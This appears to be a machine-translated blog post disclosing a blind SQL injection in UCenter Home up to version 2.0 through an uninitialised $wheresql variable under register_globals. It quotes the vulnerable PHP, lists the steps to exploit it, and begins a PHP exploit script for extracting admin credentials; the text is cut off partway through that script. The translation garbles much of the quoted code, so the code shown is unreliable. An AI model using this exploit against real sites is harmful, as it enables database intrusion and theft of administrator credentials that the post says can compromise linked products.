UCenter_Home injection across three versions of chicken ribs

Oldjun.com

This injection exists from version 1.2. At the end of 1.5, when we were widely using version, we had to build a uchome website. So we looked at the source code to find this point, I wrote a useless exp, and I lost my hard disk for more than a year. I saw that version 2.0 still exists a few days ago and told flyh4t whether to publish it. Now that xhming has been published, let me talk about it. It is estimated that many big cows have also been used as reserve 0day snow collectors for a long time.

There are two reasons:
1. Global variables must be enabled for the vulnerability, that is, register_globals is on;
2. It is based on the security of the ucenter product. Even if the password is injected, several other products can be broken.

Then we can easily see the vulnerability:

If ($ space [friendnum]) {// you must have friends to trigger
$ Groups = getfriendgroup ();

$ Theurl = cp. php? Ac = friend & op = group;
$ Group =! Isset ($ _ GET [group])? -1: intval ($ _ GET [group]);
If ($ group>-1) {// The condition can be controlled without control
$ Wheresql = "AND main. gid = $ group"; // $ wheresql is not initialized
$ Theurl. = "& group = $ group ";
}

$ Count = $ _ SGLOBAL [db]-> result ($ _ SGLOBAL [db]-> query ("select count (*) FROM". tname (friend). "main
WHERE main. uid = $ space [uid] AND main. status = 1 $ wheresql "), 0 );
$ Query = $ _ SGLOBAL [db]-> query ("SELECT main. fuid AS uid, main. fusername AS username, main. gid, main. num FROM ". tname (friend ). "main
WHERE main. uid = $ space [uid] AND main. status = 1 $ wheresql
Order by main. dateline DESC
LIMIT $ start, $ perpage ");
While ($ value = $ _ SGLOBAL [db]-> fetch_array ($ query )){
Realname_set ($ value [uid], $ value [username]);
$ Value [group] = $ groups [$ value [gid];
$ List [] = $ value;
}
$ Multi = multi ($ count, $ perpage, $ page, $ theurl );
}

Similar to the injection vulnerability exposed by ECShop last year, and the condition for exploits is the same. works with register_globals = On is required.

It is speechless that the programmer did not find the upgraded version ~

Enable global exploitation:

1. Registration number login and adding friends, must have friends;

2. Because both SQL statements are called, the union select statement is inconvenient. You can directly perform blind injection and drop a simple exp:

Silly question: what is the use of the injection password :)

<?
print_r(
--------------------------------------------------------------------------------
UChome <=2.0 "wheresql" blind SQL injection/admin credentials disclosure exploit
BY oldjun
--------------------------------------------------------------------------------
);

if ($argc<4) {
print_r(
--------------------------------------------------------------------------------
Usage: php .$argv[0]. host path
host: target server (ip/hostname)
path: path to UChome
uid: uid to UChome
Example:
php .$argv[0]. localhost / 1
--------------------------------------------------------------------------------
);
die;
}

function sendpacketii($packet)
{
global  $host, $html;
$ock=fsockopen(gethostbyname($host),80);
if (!$ock) {
echo No response from .$host; die;
}
fputs($ock,$packet);
$html=;
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}

$host=$argv[1];
$pat